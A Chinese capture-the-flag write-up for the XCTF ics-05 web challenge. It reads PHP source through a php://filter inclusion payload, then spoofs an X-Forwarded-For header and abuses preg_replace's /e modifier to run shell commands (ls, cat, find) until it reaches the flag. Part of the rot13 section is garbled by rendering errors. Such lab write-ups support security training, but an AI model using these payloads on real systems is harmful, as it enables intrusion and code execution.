XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

查看题目:

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)
提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心
打开题目地址:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

查看页面源代码:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

只有设备维护中心的链接点击会跳转到index.php:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

显示:数据接口请求异常
再查看index.php的源代码:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

在云平台设备维护中心处有一个链接?page=index
点击之后:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

它以GET方式提交page变量的值为index,后端index.php处理之后返回index。
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

传入page=123456,返回123456
所以我们需要构造传入的参数,来读取index.php的代码。
通过变量传参,有可能存在文件包含漏洞读取源码,php搭建的网站则使用php伪协议读取源码:
php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,也可以进行任意文件的读取,具有resource(要过滤的数据流)、read(读链筛选的数据流)、write(写链筛选的数据流)等等参数。
php://filter
php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。

php://filter 参数
名称 描述
resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(
write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(
<;两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

php://filter常用于:
1、利用base64获得源码
2、通过读写编码实行绕过操作
构造传入page的参数:

php://filter/read=convert.base64-encode/resource=index.php

意思是用php://filter协议读取,用base64编码的方式read=convert.base64-encode,来读取index.php的代码resource=index.php。
访问:

http://111.200.241.244:62652/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

这时页面会显示出源文件index.php经过base64编码后的内容:

PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwoKQHNlc3Npb25fc3RhcnQoKTsKcG9zaXhfc2V0dWlkKDEwMDApOwoKCj8+CjwhRE9DVFlQRSBIVE1MPgo8aHRtbD4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgbmFtZT0icmVuZGVyZXIiIGNvbnRlbnQ9IndlYmtpdCI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPWVkZ2UsY2hyb21lPTEiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLCBtYXhpbXVtLXNjYWxlPTEiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJsYXl1aS9jc3MvbGF5dWkuY3NzIiBtZWRpYT0iYWxsIj4KICAgIDx0aXRsZT7orr7lpIfnu7TmiqTkuK3lv4M8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDx1bCBjbGFzcz0ibGF5dWktbmF2Ij4KICAgICAgICA8bGkgY2xhc3M9ImxheXVpLW5hdi1pdGVtIGxheXVpLXRoaXMiPjxhIGhyZWY9Ij9wYWdlPWluZGV4Ij7kupHlubPlj7Dorr7lpIfnu7TmiqTkuK3lv4M8L2E+PC9saT4KICAgIDwvdWw+CiAgICA8ZmllbGRzZXQgY2xhc3M9ImxheXVpLWVsZW0tZmllbGQgbGF5dWktZmllbGQtdGl0bGUiIHN0eWxlPSJtYXJnaW4tdG9wOiAzMHB4OyI+CiAgICAgICAgPGxlZ2VuZD7orr7lpIfliJfooag8L2xlZ2VuZD4KICAgIDwvZmllbGRzZXQ+CiAgICA8dGFibGUgY2xhc3M9ImxheXVpLWhpZGUiIGlkPSJ0ZXN0Ij48L3RhYmxlPgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2h0bWwiIGlkPSJzd2l0Y2hUcGwiPgogICAgICAgIDwhLS0g6L+Z6YeM55qEIGNoZWNrZWQg55qE54q25oCB5Y+q5piv5ryU56S6IC0tPgogICAgICAgIDxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ic2V4IiB2YWx1ZT0ie3tkLmlkfX0iIGxheS1za2luPSJzd2l0Y2giIGxheS10ZXh0PSLlvIB85YWzIiBsYXktZmlsdGVyPSJjaGVja0RlbW8iIHt7IGQuaWQ9PTEgMDAwMyA/ICdjaGVja2VkJyA6ICcnIH19PgogICAgPC9zY3JpcHQ+CiAgICA8c2NyaXB0IHNyYz0ibGF5dWkvbGF5dWkuanMiIGNoYXJzZXQ9InV0Zi04Ij48L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ3RhYmxlJywgZnVuY3Rpb24oKSB7CiAgICAgICAgdmFyIHRhYmxlID0gbGF5dWkudGFibGUsCiAgICAgICAgICAgIGZvcm0gPSBsYXl1aS5mb3JtOwoKICAgICAgICB0YWJsZS5yZW5kZXIoewogICAgICAgICAgICBlbGVtOiAnI3Rlc3QnLAogICAgICAgICAgICB1cmw6ICcvc29tcnRoaW5nLmpzb24nLAogICAgICAgICAgICBjZWxsTWluV2lkdGg6IDgwLAogICAgICAgICAgICBjb2xzOiBbCiAgICAgICAgICAgICAgICBbCiAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnbnVtYmVycycgfSwKICAgICAgICAgICAgICAgICAgICAgeyB0eXBlOiAnY2hlY2tib3gnIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdpZCcsIHRpdGxlOiAnSUQnLCB3aWR0aDogMTAwLCB1bnJlc2l6ZTogdHJ1ZSwgc29ydDogdHJ1ZSB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnbmFtZScsIHRpdGxlOiAn6K6+5aSH5ZCNJywgdGVtcGxldDogJyNuYW1lVHBsJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnYXJlYScsIHRpdGxlOiAn5Yy65Z+fJyB9LAogICAgICAgICAgICAgICAgICAgICB7IGZpZWxkOiAnc3RhdHVzJywgdGl0bGU6ICfnu7TmiqTnirbmgIEnLCBtaW5XaWR0aDogMTIwLCBzb3J0OiB0cnVlIH0sCiAgICAgICAgICAgICAgICAgICAgIHsgZmllbGQ6ICdjaGVjaycsIHRpdGxlOiAn6K6+5aSH5byA5YWzJywgd2lkdGg6IDg1LCB0ZW1wbGV0OiAnI3N3aXRjaFRwbCcsIHVucmVzaXplOiB0cnVlIH0KICAgICAgICAgICAgICAgIF0KICAgICAgICAgICAgXSwKICAgICAgICAgICAgcGFnZTogdHJ1ZQogICAgICAgIH0pOwogICAgfSk7CiAgICA8L3NjcmlwdD4KICAgIDxzY3JpcHQ+CiAgICBsYXl1aS51c2UoJ2VsZW1lbnQnLCBmdW5jdGlvbigpIHsKICAgICAgICB2YXIgZWxlbWVudCA9IGxheXVpLmVsZW1lbnQ7IC8v5a+86Iiq55qEaG92ZXLmlYjmnpzjgIHkuoznuqfoj5zljZXnrYnlip/og73vvIzpnIDopoHkvp3otZZlbGVtZW505qih5Z2XCiAgICAgICAgLy/nm5HlkKzlr7zoiKrngrnlh7sKICAgICAgICBlbGVtZW50Lm9uKCduYXYoZGVtbyknLCBmdW5jdGlvbihlbGVtKSB7CiAgICAgICAgICAgIC8vY29uc29sZS5sb2coZWxlbSkKICAgICAgICAgICAgbGF5ZXIubXNnKGVsZW0udGV4dCgpKTsKICAgICAgICB9KTsKICAgIH0pOwogICAgPC9zY3JpcHQ+Cgo8P3BocAoKJHBhZ2UgPSAkX0dFVFtwYWdlXTsKCmlmIChpc3NldCgkcGFnZSkpIHsKCgoKaWYgKGN0eXBlX2FsbnVtKCRwYWdlKSkgewo/PgoKICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgogICAgPGRpdiBzdHlsZT0idGV4dC1hbGlnbjpjZW50ZXIiPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj48P3BocCBlY2hvICRwYWdlOyBkaWUoKTs/PjwvcD4KICAgIDxiciAvPjxiciAvPjxiciAvPjxiciAvPgoKPD9waHAKCn1lbHNlewoKPz4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlciI+CiAgICAgICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgICAgICAgIDw/cGhwCgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ2lucHV0JykgPiAwKSB7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkcGFnZSwgJ3RhOnRleHQnKSA+IDApIHsKICAgICAgICAgICAgICAgICAgICBkaWUoKTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBpZiAoc3RycG9zKCRwYWdlLCAndGV4dCcpID4gMCkgewogICAgICAgICAgICAgICAgICAgIGRpZSgpOwogICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PT0gJ2luZGV4LnBocCcpIHsKICAgICAgICAgICAgICAgICAgICBkaWUoJ09rJyk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgaW5jbHVkZSgkcGFnZSk7CiAgICAgICAgICAgICAgICAgICAgZGllKCk7CiAgICAgICAgICAgICAgICA/PgogICAgICAgIDwvcD4KICAgICAgICA8YnIgLz48YnIgLz48YnIgLz48YnIgLz4KCjw/cGhwCn19CgoKLy/mlrnkvr/nmoTlrp7njrDovpPlhaXovpPlh7rnmoTlip/og70s5q2j5Zyo5byA5Y+R5Lit55qE5Yqf6IO977yM5Y+q6IO95YaF6YOo5Lq65ZGY5rWL6K+VCgppZiAoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10gPT09ICcxMjcuMC4wLjEnKSB7CgogICAgZWNobyAiPGJyID5XZWxjb21lIE15IEFkbWluICEgPGJyID4iOwoKICAgICRwYXR0ZXJuID0gJF9HRVRbcGF0XTsKICAgICRyZXBsYWNlbWVudCA9ICRfR0VUW3JlcF07CiAgICAkc3ViamVjdCA9ICRfR0VUW3N1Yl07CgogICAgaWYgKGlzc2V0KCRwYXR0ZXJuKSAmJiBpc3NldCgkcmVwbGFjZW1lbnQpICYmIGlzc2V0KCRzdWJqZWN0KSkgewogICAgICAgIHByZWdfcmVwbGFjZSgkcGF0dGVybiwgJHJlcGxhY2VtZW50LCAkc3ViamVjdCk7CiAgICB9ZWxzZXsKICAgICAgICBkaWUoKTsKICAgIH0KCn0KCgoKCgo/PgoKPC9ib2R5PgoKPC9odG1sPgo=

经过Base64解码:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

得到:

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

其他的加密方式也可以,如rot13:

http://111.200.241.244:62652/index.php?page=php://filter/read=string.rot13/resource=index.php

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

得到源文件index.php经过rot13编码后的内容:

设备维护中心 云平台设备维护中心 设备列表 ynlhv.hfr(‘gnoyr’, shapgvba() { ine gnoyr =
ynlhv.gnoyr, sbez = ynlhv.sbez; gnoyr.eraqre({ ryrz: ‘#grfg’, hey:
‘/fbzeguvat.wfba’, pryyZvaJvqgu: 80, pbyf: [ [ { glcr: ‘ahzoref’ }, {
glcr: ‘purpxobk’ }, { svryq: ‘vq’, gvgyr: ‘VQ’, jvqgu: 100, haerfvmr:
gehr, fbeg: gehr }, { svryq: ‘anzr’, gvgyr: ‘设备名’, grzcyrg: ‘#anzrGcy’
}, { svryq: ‘nern’, gvgyr: ‘区域’ }, { svryq: ‘fgnghf’, gvgyr: ‘维护状态’,
zvaJvqgu: 120, fbeg: gehr }, { svryq: ‘purpx’, gvgyr: ‘设备开关’, jvqgu:
85, grzcyrg: ‘#fjvgpuGcy’, haerfvmr: gehr } ] ], cntr: gehr }); });
ynlhv.hfr(‘ryrzrag’, shapgvba() { ine ryrzrag = ynlhv.ryrzrag;
//导航的ubire效果、二级菜单等功能,需要依赖ryrzrag模块 //监听导航点击 ryrzrag.ba(‘ani(qrzb)’,
shapgvba(ryrz) { //pbafbyr.ybt(ryrz) ynlre.zft(ryrz.grkg()); }); });
0) { qvr(); } vs (fgecbf( c n t r , ′ g n : g r k g ′ ) > 0 ) q v r ( ) ; v s ( f g e c b f ( cntr, 'gn:grkg') > 0) { qvr(); } vs (fgecbf( cntr,′gn:grkg′)>0)qvr();vs(fgecbf(cntr, ‘grkg’) > 0) { qvr(); } vs ( c n t r = = = ′ v a q r k . c u c ′ ) q v r ( ′ B x ′ ) ; v a p y h q r ( cntr === 'vaqrk.cuc') { qvr('Bx'); } vapyhqr( cntr===′vaqrk.cuc′)qvr(′Bx′);vapyhqr(cntr); qvr(); ?> Jrypbzr Zl Nqzva ! "; $cnggrea
= $_TRG[cng]; $ercynprzrag = $_TRG[erc]; $fhowrpg = T R G [ f h o ] ; v s ( v f f r g ( _TRG[fho]; vs (vffrg( T​RG[fho];vs(vffrg(cnggrea) && vffrg(KaTeX parse error: Expected 'EOF', got '&' at position 14: ercynprzrag) &̲& vffrg(fhowrpg)) {
cert_ercynpr($cnggrea, $ercynprzrag, $fhowrpg); }ryfr{ qvr(); } } ?>

将上面的php代码rot13解码http://www.mxcz.net/tools/rot13.aspx:

得到:

layui.use(‘table’, function() { var table = layui.table, form =
layui.form; table.render({ elem: ‘#test’, url: ‘/somrthing.json’,
cellMinWidth: 80, cols: [ [ { type: ‘numbers’ }, { type: ‘checkbox’ },
{ field: ‘id’, title: ‘ID’, width: 100, unresize: true, sort: true },
{ field: ‘name’, title: ‘设备名’, templet: ‘#nameTpl’ }, { field: ‘area’,
title: ‘区域’ }, { field: ‘status’, title: ‘维护状态’, minWidth: 120, sort:
true }, { field: ‘check’, title: ‘设备开关’, width: 85, templet:
‘#switchTpl’, unresize: true } ] ], page: true }); });
layui.use(‘element’, function() { var element = layui.element;
//导航的hover效果、二级菜单等功能,需要依赖element模块 //监听导航点击 element.on(‘nav(demo)’,
function(elem) { //console.log(elem) layer.msg(elem.text()); }); });
0) { die(); } if (strpos( p a g e , ′ t a : t e x t ′ ) > 0 ) d i e ( ) ; i f ( s t r p o s ( page, 'ta:text') > 0) { die(); } if (strpos( page,′ta:text′)>0)die();if(strpos(page, ‘text’) > 0) { die(); } if ( p a g e = = = ′ i n d e x . p h p ′ ) d i e ( ′ O k ′ ) ; i n c l u d e ( page === 'index.php') { die('Ok'); } include( page===′index.php′)die(′Ok′);include(page); die(); ?> Welcome My Admin ! "; $pattern
= $_GET[pat]; $replacement = $_GET[rep]; $subject = G E T [ s u b ] ; i f ( i s s e t ( _GET[sub]; if (isset( G​ET[sub];if(isset(pattern) && isset(KaTeX parse error: Expected 'EOF', got '&' at position 14: replacement) &̲& isset(subject)) {
preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?>

美化后的php代码:

layui.use('element', function() {
	var element = layui.element;
	//导航的hover效果、二级菜单等功能,需要依赖element模块 //监听导航点击 
	element.on('nav(demo)', function(elem) {
		//console.log(elem) layer.msg(elem.text());
	}
	);
}
);
0) {
	die();
}
if (strpos($page, 'ta:text') > 0) {
	die();
}
if (strpos($page, 'text') > 0) {
	die();
}
if ($page === 'index.php') {
	die('Ok');
}
include($page);
die();
?> 
	Welcome My Admin ! ";
	$pattern = $_GET[pat]; 
	$replacement = $_GET[rep]; 
	$subject = $_GET[sub]; 
if (isset($pattern) && isset($replacement) && isset($subject)) { 
	preg_replace($pattern, $replacement, $subject);
 }else{ 
	die(); 
} 
} 
?>

其中的关键部分代码就是:
/

/方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

代码首先要求HTTP 扩展头部X-FORWARDED-FOR:表示 HTTP 请求端真实 IP,是来自本地127.0.0.1
这个我们可以通过伪造XFF头来登入系统:

X-Forwarded-For:127.0.0.1

然后3个变量从GET方式中获取提交的参数,再判断3个变量存在且非空,则执行preg_replace函数正则表达式替换字符串:
preg_replace(PHP 5.5)语法:

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

搜索subject中匹配pattern的部分, 以replacement进行替换。
参数说明:
$pattern: 要搜索的模式,可以是字符串或一个字符串数组。
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
$limit: 可选,对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1(无限制)。
$count: 可选,为替换执行的次数。
  这里我们需要利用preg_replace函数的一个“/e”模式:当pre_replace的参数pattern输入“/e” 修正符的时候 ,preg_replace()函数将参数replacement的代码当作PHP代码执行,并且以eval函数的方式执行。
  我们要利用这个漏洞执行代码,并确保replacement构成一个合法的 PHP 代码字符串,通过上面的代码我们知道,我们通过GET方式提交的参数pat、rep、sub,只要在sub参数中有要搜索的pat的内容,同时将在rep前加上 “/e” 触发漏洞,就可以执行replacement中的 PHP 代码。
sub 和 pat 的参数构造只要满足漏洞触发的条件就行,rep参数则设置为php代码命令phpinfo()输出关于 PHP 配置的信息:PHP编译选项、启用的扩展、PHP版本、服务器信息和环境变量(如果编译为一个模块的话)、PHP环境变量、操作系统版本信息、path变量、配置选项的本地值和主值、HTTP头和PHP授权信息(License)。
以此确定任意命令执行漏洞的存在:

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=phpinfo()&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

成功输出关于 PHP 配置的信息,证明任意命令执行漏洞确实存在
之后我们rep参数则设置为php代码命令“system(‘ls’)”,这句代码用于命令行执行 ls 命令显示当前目录下的所有文件:

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('ls')&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

得到当前目录下的文件和文件夹有:css index.html index.php js layui logo.png s3chahahaDir start.sh 视图.png
之后我们可以逐个查看文件和文件夹的内容,例如s3chahahaDir文件夹看起来比较特别:

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('ls+s3chahahaDir')&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发现下面有个flag文件或者文件夹,继续查看

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('ls+s3chahahaDir/flag')&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

下面有一个flag.php,应该就是flag所在的文件,查看它的内容:

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

得到flag:cyberpeace{3dd22031934397dc513678867ccef201}
其实也可以直接在所有目录下搜索文件名含flag的文件快速查找:

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('find+/+-name+"flag*"')&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

其实可以直接在当前目录下搜索文件名含flag的文件快速查找,在find后面加个.就表示在当前目录下搜索:

X-Forwarded-For:127.0.0.1
?pat=/123/e&rep=system('find+.+-name+"flag*"')&sub=123

XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)

发送之后得到的响应:
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)
从php 5.5.0后/e修饰符已经被弃用了。而7.0.0不再支持/e修饰符。PHP 5.5.0起,传入"/e"修饰符的时候,会产生一个E_DEPRECATED 错误;PHP 7.0.0起,会产生E_WARNING错误,同时"/e"也无法起效。

上一篇:PHP str_replace() 函数详解


下一篇:C++类与对象笔记十三:继承二:继承方式